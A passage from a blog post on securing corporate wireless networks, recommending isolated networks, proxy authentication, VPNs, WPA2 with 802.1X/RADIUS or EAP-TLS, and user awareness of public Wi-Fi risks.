  3. Static IP addressing stops attackers from being assigned DHCP addresses. It does not block a knowledgeable attacker.

Recommended strategies to implement a wireless network

There are different approaches depending on the size of the organization and the level of in-house IT expertise:

  1. Create a completely isolated wireless network: Users must authenticate and have acceptable security software before they can connect to the Internet or, for that matter, to any local network resources. This approach requires a Network Access Server.
  2. Forward all web traffic to a proxy server which provides authentication and authorization.
  3. Require users to access resources through a virtual private network (VPN). VPNs provide encryption from the user’s location to the destination router (remote-access VPNs) or from the user’s router to the destination router (site-to-site VPNs). There are numerous implementations of VPNs including PPTP, L2TP, IPsec, and SSH.

Using end-to-end encryption would be ideal. However, not all intervening software and hardware may support encryption.  For example, not all web sites offer https, and even if they do, the browser sends out IP addresses in clear text. The next best alternative is to require users to connect to the company network through VPNs .

Of course, authentication is critical. IEEE 802.11i Wi-Fi Protected Access II (WPA2) should be used. For authentication, there are alternatives:

  • Pre-shared key (PSK) – This is normally used only in a home environment and provides Advanced Encryption Standard (AES) encryption.
  • EAPOL (Extensible Authentication Protocol over LANs) with 802.1X and an authentication server such as RADIUS or DIAMETER: There are open-source RADIUS servers that could easily accommodate the needs of most businesses.
  • EAPOL with EAP-TLS: The majority of implementations require client-side X.509 certificates.

A hardware or software card or token can be used in combination with the above authentication techniques, depending on the vendor.

Finally…

Educate your users about the dangers of using public wireless. Be aware of “shoulder surfing” in public wireless areas. An attacker doesn’t necessarily have to be a computer genius.

3 Comments

Posted in Encryption, Hacking, Hacks, Network, Security, Technology

Tagged , , , , , ,